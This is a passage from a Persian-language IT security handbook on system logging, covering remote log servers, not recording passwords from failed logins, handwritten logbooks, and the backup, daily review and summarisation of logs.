ﺍﻃﻼﻋﺎﺕ ﺛﺒﺘﻲ ﺳﺎﻳﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﻭﻟﻲ ﻧﺘﻮﺍﻧﺪ ﻫﻴﭻ ﺑﺴﺘﻪﺍﻱ ﺭﺍ ﺭﻭﻱ ﺷﺒﻜﻪ ﺑﻔﺮﺳﺘﺪ .ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺛﺒـﺖ
ﺩﺭ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﭘﺎﻙ ﺷﺪﻥ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﻛﻤﻚ ﻣﻲﻛﻨﺪ .ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺘﻤﺮﻛﺰ ﺛﺒﺖ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ،ﻣﺤﻠﻲ ﺍﻳﺪﻩﺁﻝ ﺑـﺮﺍﻱ
ﺍﺟﺮﺍﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺭﻭﻱ ﺛﺒﺘﻬﺎﻱ ﺟﻤﻊﺁﻭﺭﻱ ﺷﺪﻩ ﻧﻴﺰ ﻣﻲﺑﺎﺷﺪ.
ﺛﺒﺘﻬﺎ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺭﻭﻱ ﺭﺳﺎﻧﻪﻫﺎﻱ ﻳﻜﺒﺎﺭ ﻧﻮﺷﺘﻨﻲ ﻧﻮﺷﺖ ﻳﺎ ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪ .ﻃﺒﻴﻌﻲ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺩﺳﺘﻪ ﺍﺯ ﺛﺒﺘﻬﺎ ﺭﺍ ﻧﻤﻲﺗـﻮﺍﻥ ﺑـﺪﻭﻥ •
ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩ ،ﻭ ﺍﻟﺒﺘﻪ ﻧﮕﻬﺪﺍﺭﻱ ﺣﺠﻢ ﺯﻳﺎﺩ ﺁﻧﻬﺎ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺩﺳﺮﺳﺎﺯ ﺑﺎﺷﺪ.
ﺑﺮﺧﻲ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﻪ ﺩﻻﻳﻞ ﺍﻣﻨﻴﺘﻲ ﻫﺮﮔﺰ ﻧﺒﺎﻳﺪ ﺛﺒﺖ ﻛﺮﺩ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻫﺮﭼﻨﺪ ﺗﻼﺷﻬﺎﻱ ﻧﺎﻣﻮﻓﻖ ﺑﺮﺍﻱ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺭﻣﺰ ﻋﺒـﻮﺭ ﺑﺎﻳـﺪ ﺛﺒـﺖ
ﺷﻮﻧﺪ ،ﻭﻟﻲ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﻜﺎﺭ ﺭﻓﺘﻪ ﺩﺭ ﺍﻳﻦ ﺗﻼﺷﻬﺎ ﻫﺮﮔﺰ ﻧﺒﺎﻳﺪ ﺛﺒﺖ ﮔﺮﺩﺩ .ﻛﺎﺭﺑﺮﺍﻥ ﻣﻜﺮﺭﹰﺍ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺍﺷﺘﺒﺎﻩ ﺗﺎﻳﭗ ﻣﻲﻛﻨﻨﺪ ﻭ ﺛﺒﺖ ﺍﻳﻦ
ﺍﺷﺘﺒﺎﻫﺎﺕ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺩﺭ ﻳﺎﻓﺘﻦ ﺭﻣﺰ ﻋﺒﻮﺭ ﺻﺤﻴﺢ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻧﻔﻮﺫ ﺑﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺷـﺨﺺ ﻛﻤـﻚ ﻛﻨـﺪ .ﺑﺮﺧـﻲ ﺭﺍﻫﺒـﺮﺍﻥ
ﺳﻴﺴﺘﻢ ﺣﺘﻲ ﺍﻋﺘﻘﺎﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﺗﻼﺷﻬﺎﻱ ﻧﺎﻣﻮﻓﻖ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ،ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻧﻴﺰ ﻧﺒﺎﻳﺪ ﺛﺒﺖ ﺷﻮﺩ -ﺑﺨﺼﻮﺹ ﺍﮔﺮ ﺣﺴﺎﺑﻲ ﻛﻪ ﻛـﺎﺭﺑﺮ ﻧـﺎﻡ
ﺁﻧﺮﺍ ﻭﺍﺭﺩ ﻛﺮﺩﻩ ﻭﺟﻮﺩ ﺧﺎﺭﺟﻲ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ ﻭ ﺩﻟﻴﻞ ﺁﻧﻬﺎ ﻫﻢ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﮔﺎﻫﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺧـﻮﺩ ﺭﺍ ﺑﺠـﺎﻱ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻭﺍﺭﺩ
ﻣﻲﻛﻨﻨﺪ.
)"user: "jhalonen
ﺍﻳﻦ ﭘﻴﺎﻡ ﺑﻮﺳﻴﻠﺔ ﺑﺮﻧﺎﻣﺔ postfixﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻳﻦ ﭘﻴﺎﻡ ﮔﺰﺍﺭﺵ ﻣﻲﺩﻫﺪ ﻛﻪ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﺎ ﺷﻨﺎﺳـﺔ 80AD8E44308
ﺑــﺮﺍﻱ ﻛــﺎﺭﺑﺮ jhalonen@ex.comﺩﺭﻳﺎﻓــﺖ ﺷــﺪ ،ﻭ ﻣــﻲﮔﻮﻳــﺪ ﻛــﻪ ﺁﻥ ﭘﻴــﺎﻡ ﺑــﻪ ﺣﺎﻟــﺖ ﺗﻌﻠﻴــﻖ ﺩﺭ ﺁﻣــﺪ ،ﭼــﻮﻥ ﻛــﺎﺭﺑﺮ
٣٣٧
jhalonen@ex.comﻭﺟﻮﺩ ﺧﺎﺭﺟﻲ ﻧﺪﺍﺷﺖ"" .ﮔﺮﻭﻩ" ﺍﻳﻦ ﻭﺍﻗﻌﻪ "ﻧﺎﻣﻪ" ) (mailﻭ ﺣﺴﺎﺳﻴﺖ ﺁﻥ "ﺟﻬﺖ ﺍﻃﻼﻉ" ) (infoﻣﻲﺑﺎﺷﺪ.
۳۳۷ﺑﺮﺍﻱ ﺑﺤﺚ ﺟﺰﺋﻲﺗﺮ ﺩﺭ ﻣﻮﺭﺩ ﭘﻴﻜﺮﺑﻨﺪﻱ ،ﺍﻭﻟﻮﻳﺘﻬﺎ ﻭ ﺗﺴﻬﻴﻼﺕ ﺍﻧﺠﺎﻡ ﺛﺒﺖ ﺩﺭ ،Unixﺑﻪ ﺻﻔﺤﺎﺕ ۶۴۲ﺗﺎ ۶۵۴ﺍﺯ ﮐﺘﺎﺏ PUISﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٢٨
ﺑﺮﺧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺤﻠﻴﻞ ﻣﺎﻧﻨﺪ Microsoft Event Viewerﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺻﺎﻓﻴﻬﺎ ﻭ ﻋﻮﺍﻣﻞ ﻣﻮﺭﺩ ﻧﻈـﺮ ﺧـﻮﺩ ﺭﺍ ﺍﻧﺘﺨـﺎﺏ
ﻛﻨﻴﺪ .ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻣﺎﻧﻨﺪ Swatchﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ Unixﺑﺼﻮﺭﺕ ﺑﻼﺩﺭﻧﮓ ﺑﺮ ﺛﺒﺘﻬﺎ ﻧﻈﺎﺭﺕ ﻣﻲﻛﻨﻨـﺪ ﻭ ﻫﺮﮔـﺎﻩ ﺍﺗﻔـﺎﻕ ﻣﻬﻤـﻲ
٣٣٨
ﺑﻴﺎﻓﺘﺪ ﺍﺧﻄﺎﺭ ﻣﻲﺩﻫﻨﺪ.
ﺛﺒﺘﻬﺎﻱ ﺩﺳﺖﻧﻮﻳﺲ
ﻧﻮﻉ ﺩﻳﮕﺮﻱ ﺍﺯ ﺛﺒﺖ ﻛﻪ ﺩﺭ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪ ﺍﻧﺠﺎﻡ ﻧﻤـﻲﭘـﺬﻳﺮﺩ ،ﺑﻠﻜـﻪ ﺑﻮﺳـﻴﻠﺔ ﺧـﻮﺩ ﺷـﻤﺎ ﻭ ﻛﺎﺭﻣﻨـﺪﺍﻥ
ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ .ﻳﻚ ﺩﻓﺘﺮﭼﻪ ﺑﺮﺍﻱ ﺛﺒﺖ ﻭﻗﺎﻳﻊ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺭﻭﺯﺍﻧﺔ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺁﻥ ﺛﺒﺖ ﻛﻨﻴﺪ .ﺩﻓﺎﺗﺮ ﺛﺒﺖ ﺑﺎﻳﺪ ﻛﺎﻏﺬﻱ ﺑﺎﺷﻨﺪ
ﻭ ﺩﺭ ﻣﻜﺎﻧﻲ ﻧﮕﻬﺪﺍﺷﺘﻪ ﺷﻮﻧﺪ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﻓﻴﺰﻳﻜﻲ ﺍﻣﻦ ﺑﺎﺷﺪ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺭﻭﻱ ﻛﺎﻏﺬ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ ،ﻛﺴﻲ ﻛﻪ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪ ﺷـﻤﺎ
ﺣﺘﻲ ﺑﺎ ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ ﺍﺑﺮﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﺷﻮﺩ ،ﻧﻤﻲﺗﻮﺍﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ .ﺍﻳﻦ ﺛﺒﺘﻬﺎ ﻳﻚ ﺑﺎﻳﮕﺎﻧﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﻬـﻢ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺑـﺼﻮﺭﺕ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻗﺎﺑﻞ ﺩﺳﺘﻜﺎﺭﻱ ﻧﻴﺴﺘﻨﺪ.
ﺛﺒﺘﻬﺎﻱ ﺩﺳﺖﻧﻮﻳﺲ ﻣﺰﺍﻳﺎﻱ ﻣﺘﻌﺪﺩﻱ ﻧﺴﺒﺖ ﺑﻪ ﺛﺒﺘﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺍﺭﻧﺪ .ﺩﺭ ﺍﻳﻨﺠﺎ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﻣـﺴﺎﺋﻠﻲ ﺭﺍ ﺛﺒـﺖ ﻛﻨﻴـﺪ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎ
ﻼ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺑﻪ ﺑﻤﺐﮔﺬﺍﺭﻱ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺣﺘﻲ ﻭﻗﺘﻲ ﺳﻴﺴﺘﻢ ﺧﺎﻣﻮﺵ ﺍﺳﺖ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺛﺒﺘﻬﺎﻱ ﻛﺎﻏـﺬﻱ ﺭﺍ ﺑﺨﻮﺍﻧﻴـﺪ. ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ،ﻣﺜ ﹰ
ﺩﺭ ﻗﻮﺍﻧﻴﻦ ﺑﺮﺧﻲ ﻛﺸﻮﺭﻫﺎ ﺛﺒﺘﻬﺎﻱ ﻛﺎﻏﺬﻱ ﻣﺪﺍﺭﻙ ﻣﻌﺘﺒﺮﺗﺮﻱ ﺍﺯ ﺛﺒﺘﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ.
ﺑﺰﺭﮔﺘﺮﻳﻦ ﻣﺸﻜﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻓﺘﺮﭼﻪﻫﺎﻱ ﺛﺒﺖ ،ﺯﻣﺎﻥ ﺯﻳﺎﺩﻱ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺑﻪ ﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺁﻧﻬﺎ ﻻﺯﻡ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺩﻳﮕـﺮ ﻧﻤـﻲﺗـﻮﺍﻥ
ﻋﻤﻠﻴﺎﺕ ﺛﺒﺖ ﺭﺍ ﺑﻪ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﺧﻮﺩﻛﺎﺭ ﺳﭙﺮﺩ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻳﻦ ﻣﻌﻀﻞ ﺯﻣﺎﻧﻲ ﺑﺰﺭﮔﺘﺮﻳﻦ ﺩﻟﻴﻠـﻲ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﺭﺍﻫﺒـﺮﺍﻥ
ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺪﺍﻭﻡ ﺍﺯ ﺍﻳﻦ ﻗﺒﻴﻞ ﺛﺒﺘﻬﺎ ﺍﻛﺮﺍﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ )ﺑﺨﺼﻮﺹ ﺩﺭ ﺍﺩﺍﺭﻩﻫﺎﻳﻲ ﺑﺎ ﺻﺪﻫﺎ ﻳﺎ ﻫﺰﺍﺭﺍﻥ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﻫﺮﻳﻚ ﺍﺯ ﺁﻧﻬﺎ ﻧﻴـﺎﺯ ﺑـﻪ ﻳـﻚ
ﺩﻓﺘﺮﭼﺔ ﺛﺒﺖ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺩﺍﺭﺩ( .ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺷﻮﺩ ﺑﺠﺎﻱ ﺗﻼﺵ ﺑﻴﻬﻮﺩﻩ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ ﭼﻨﺪﻳﻦ ﺩﻓﺘﺮﭼﺔ ﺛﺒﺖ ،ﺳﻌﻲ ﻛﻨﻴﺪ ﺑﺎ ﻛﻤﻲ
ﺧﻼﻗﻴﺖ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻛﻢ ﻛﺮﺩﻥ ﺣﺠﻢ ﺛﺒﺘﻬﺎ ﺑﺪﻭﻥ ﻛﺎﺳﺘﻪ ﺷﺪﻥ ﺍﺯ ﺍﺭﺯﺵ ﺁﻥ ﺑﻴﺎﺑﻴﺪ .ﺩﻭ ﺭﻭﺵ ﺑﺮﺍﻱ ﻛﺎﺳﺘﻦ ﺍﺯ ﺛﺒﺘﻬﺎﻱ ﺍﺿـﺎﻓﻲ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ
"ﻓﺸﺮﺩﻩﺳﺎﺯﻱ ﺍﻃﻼﻋﺎﺕ ﺛﺒﺖ" ﻭ "ﻧﮕﻬﺪﺍﺭﻱ ﺛﺒﺖ ﮔﺮﻭﻫﻲ ﺑﺮﺍﻱ ﺩﺳﺘﻪﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ"؛ ﮐﻪ ﻫﺮﮐﺪﺍﻡ ﺍﮔﺮ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ ،ﭼﻴﺰﻱ
ﺍﺯ ﺍﺭﺯﺵ ﺛﺒﺘﻬﺎ ﻧﻤﻲﻛﺎﻫﻨﺪ.
ﺍﺳﺎﺳﹰﺎ ﺩﻭ ﻧﻮﻉ ﺩﻓﺘﺮﭼﺔ ﺛﺒﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ :ﺛﺒﺖ ﺑﻪ ﺍﺯﺍﻱ ﻫﺮ ﺍﺩﺍﺭﻩ ،ﻭ ﺛﺒﺖ ﺑﻪ ﺍﺯﺍﻱ ﻫﺮ ﺭﺍﻳﺎﻧـﻪ .ﺩﺭ ﺩﻓﺘﺮﭼـﻪﻫـﺎﻱ ﺛﺒـﺖ ﺑـﻪ ﺍﺯﺍﻱ ﻫـﺮ ﺍﺩﺍﺭﻩ ﺍﺯ
ﺍﻃﻼﻋﺎﺗﻲ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺗﻤﺎﻡ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﻋﻤﻠﻴﺎﺕ ﺷﻤﺎ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ .ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ ﮔـﺰﺍﺭﺵ ﺭﺧـﺪﺍﺩﻫﺎ ﻭ
ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﺳﺘﺜﻨﺎﻳﻲ )ﻗﻄﻌﻲ ﺑﺮﻕ ،ﻓﻌﺎﻝ ﺷﺪﻥ ﻭ ﺗﺴﺖ ﺯﻧﮓﺧﻄﺮﻫﺎ ،ﻛﺎﺭﻫﺎﻱ ﭘﺮﺳﻨﻠﻲ ﺭﻭﻱ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺧـﺎﺹ( ،ﻭ ﻣـﻮﺍﺩ ﺍﻃﻼﻋـﺎﺗﻲ )ﺍﻃﻼﻋـﺎﺕ
ﺗﻤﺎﺱ ،ﺭﺳﻴﺪﻫﺎﻱ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭ ،ﺷﻤﺎﺭﻩﺳـﺮﻳﺎﻝ ﺍﺑﺰﺍﺭﻫـﺎ ،ﺁﺩﺭﺱ MACﻣﺎﺷـﻴﻨﻬﺎﻱ ﻣﺠﻬـﺰ ﺑـﻪ ،Ethernetﻧـﺴﺨﻪﻫـﺎﻳﻲ ﺍﺯ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻣـﺴﻴﺮﻳﺎﺑﻬﺎ ﻭ(...
ﺗﻘﺴﻴﻢﺑﻨﺪﻱ ﻛﺮﺩ .ﺑﺮﺍﻱ ﻫﺮ ﻣﺎﺷﻴﻦ ﻧﻴﺰ ﺑﺎﻳﺪ ﻳﻚ ﺩﻓﺘﺮﭼﺔ ﺛﺒﺖ ﻣﺨﺼﻮﺹ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﻭ ﺩﺭ ﺁﻥ ﮔﺰﺍﺭﺷـﺎﺕ ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﺳـﺘﺜﻨﺎﻳﻲ ﻣﺜـﻞ
ﮔﺰﺍﺭﺵ ﺧﺮﺍﺑﻴﻬﺎﻱ ﺳﻴﺴﺘﻢ ،ﺯﻣﺎﻧﻬﺎﻱ ﺧﺎﻣﻮﺵ ﺑﻮﺩﻥ ﺭﺍﻳﺎﻧﻪ ،ﺍﻳﺠﺎﺩ ﻭ ﺣﺬﻑ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ،ﺗﻐﻴﻴﺮ ﺭﻣﺰ ﻋﺒـﻮﺭ ،ﻧـﺼﺐ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ،ﻭ ﻧﻴـﺰ
ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﺯ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﻪ ﺛﺒﺖ ﺑﺮﺳﺎﻧﻴﺪ .ﻣﻮﺍﺩ ﺍﻃﻼﻋﺎﺗﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺷﺎﻣﻞ ﻧﺴﺨﻪﻫـﺎﻱ ﻓﺎﻳﻠﻬـﺎﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ ،ﻓﻬﺮﺳـﺖ ﻭﺻـﻠﻪﻫـﺎﻱ
ﺍﻋﻤﺎﻝﺷﺪﻩ ،ﻭ ﻧﻴﺰ ﻭﺿﻌﻴﺖ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺩﻳﺴﻜﻬﺎ ﺑﺎﺷﻨﺪ.
ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺑﻄﻮﺭ ﻣﻨﻈﻢ -ﺗﺮﺟﻴﺤﹰﺎ ﻫﺮ ﺭﻭﺯ -ﺑﻪ ﺭﻭﻱ ﺭﺳـﺎﻧﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﻣﻨﺘﻘـﻞ ﻣـﻲﺷـﻮﻧﺪ .ﺯﻣﺎﻧﺒﻨـﺪﻱ
ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑﺎﻳﺪ ﺑﻪ ﮔﻮﻧﻪﺍﻱ ﺑﺎﺷﺪ ﻛﻪ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﻣﺘﻨﺎﻭﺑﹰﺎ ﭘﺎﻙ ﻣﻲﺷﻮﻧﺪ ﻗﺒﻞ ﺍﺯ ﭘﺎﻙ ﺷﺪﻥ ﺑـﻪ ﺭﻭﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﻣﻨﺘﻘـﻞ ﺷـﺪﻩ ﺑﺎﺷـﻨﺪ.
ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻣﻲﺷﻮﺩ ﻛﻪ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﺳﺎﺑﻘﻪﺍﻱ ﺍﺯ ﺭﻓﺘﺎﺭ ﻭ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ.
ﻣﺮﻭﺭ ﻛﺮﺩﻥ
ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺍ ﺣﺪﺍﻗﻞ ﺭﻭﺯﻱ ﻳﻜﺒﺎﺭ ﻣﺮﻭﺭ ﻛﻨﻴﺪ .ﺍﮔﺮ ﺑﻪ ﻃﻮﺭ ﻣﺮﺗﺐ ﺛﺒﺘﻬﺎ ﺭﺍ ﻣﺮﻭﺭ ﻧﻜﻨﻴﺪ ،ﻧﮕﻬﺪﺍﺭﻱ ﺁﻧﻬﺎ ﻛﻤﻜﻲ ﺑـﻪ ﺷـﻤﺎ ﻧﻤـﻲﻛﻨـﺪ .ﺑـﻪ
ﻛﻤﻚ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻣﺸﻜﻼﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ،ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺒﻜﻪ ﻭ ﻫﻤﭽﻨﻴﻦ ﻧﺎﺭﺳﺎﺋﻴﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻴﺪ.
ﭘﺮﺩﺍﺯﺵ
ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺤﻠﻴﻠﮕﺮ ،ﺧﻼﺻﻪ ﻛﻨﻴﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﮔﺰﺍﺭﺷﺎﺕ ﺛﺒﺖﺷـﺪﻩ ﻣﻄﻠـﺐ ﻗﺎﺑـﻞ ﺗـﻮﺟﻬﻲ ﻧﺪﺍﺭﻧـﺪ.
ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﻳﺪﻥ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﺁﻧﻘﺪﺭ ﺑﺮﺍﻱ ﺷﻤﺎ ﻋﺎﺩﻱ ﺷﻮﺩ ﻛﻪ ﻃﺒﻖ ﻋﺎﺩﺕ ﺑﺮﺍﻱ ﺩﻳﺪﻥ ﺍﻳﻨﻜﻪ ﻣﺸﻜﻠﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻳﺎ ﻧﻪ ،ﻳﻚ ﻧﮕﺎﻩ ﮔـﺬﺭﺍ
ﺑﻪ ﮔﺰﺍﺭﺷﺎﺕ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ ،ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺑﺴﻴﺎﺭ ﺍﺣﺘﻤﺎﻝ ﺩﺍﺭﺩ ﻛﻪ ﻣﺘﻮﺟﻪ ﻳﻚ ﭘﻴﺎﻡ ﻣﻬﻢ ﻧﺸﻮﻳﺪ.
ﺩﺭ ﺧﻼﺻﻪﺳﺎﺯﻱ ﺑﺎﻳﺪ ﺩﻗﺖ ﻛﻨﻴﺪ .ﻧﺒﺎﻳﺪ ﺛﺒﺘﻬﺎ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﺧﻼﺻﻪ ﮐﻨﻴﺪ ﻛﻪ ﻣﻄﺎﻟﺐ ﻣﻬﻤﻲ ﻛﻪ ﺷﻤﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺑﺒﻴﻨﻴـﺪ ﺭﺍ ﺍﻧﺘﺨـﺎﺏ ﻛﻨـﺪ ﻭ
ﺑﻘﻴﻪ ﺭﺍ ﺩﻭﺭ ﺑﻴﺎﻧﺪﺍﺯﺩ .ﺩﺭ ﭼﻨﻴﻦ ﺳﻴﺴﺘﻤﻲ ﺑﺴﻴﺎﺭ ﻣﺤﺘﻤﻞ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﭘﻴﺎﻡ ﻣﻬﻢ ﻗﺒﻞ ﺍﺯ ﺧﻮﺍﻧﺪﻩ ﺷﺪﻥ ،ﺩﻭﺭ ﺭﻳﺨﺘـﻪ ﺷـﻮﺩ .ﺩﺭﻋـﻮﺽ ﺑﺎﻳـﺪ
ﭘﻴﺎﻣﻬﺎﻱ ﺧﺴﺘﻪﻛﻨﻨﺪﻩ ﺭﺍ ﺑﺎ ﺩﻗﺖ ﺩﺭ ﺗﻄﺒﻴﻖ ﺍﻟﮕﻮ ﺗﺎ ﺣﺪ ﻣﻤﻜﻦ ﻏﺮﺑﺎﻝ ﻛﻨﺪ ،ﻭ ﺑﻘﻴﻪ ﺭﺍ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺑﻪ ﺷـﻤﺎ ﺑـﺴﭙﺎﺭﺩ .ﻫـﺮ ﺍﺯ ﭼﻨـﺪﮔﺎﻩ ﺑﺎﻳـﺪ
